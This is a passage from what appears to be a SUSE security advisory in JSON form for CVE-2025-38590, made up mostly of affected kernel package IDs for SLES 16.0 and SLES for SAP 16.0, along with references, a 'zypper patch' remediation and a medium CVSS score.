"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38590",
"url": "https://www.suse.com/security/cve/CVE-2025-38590"
},
{
"category": "external",
"summary": "SUSE Bug 1248360 for CVE-2025-38590",
"url": "https://bugzilla.suse.com/1248360"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
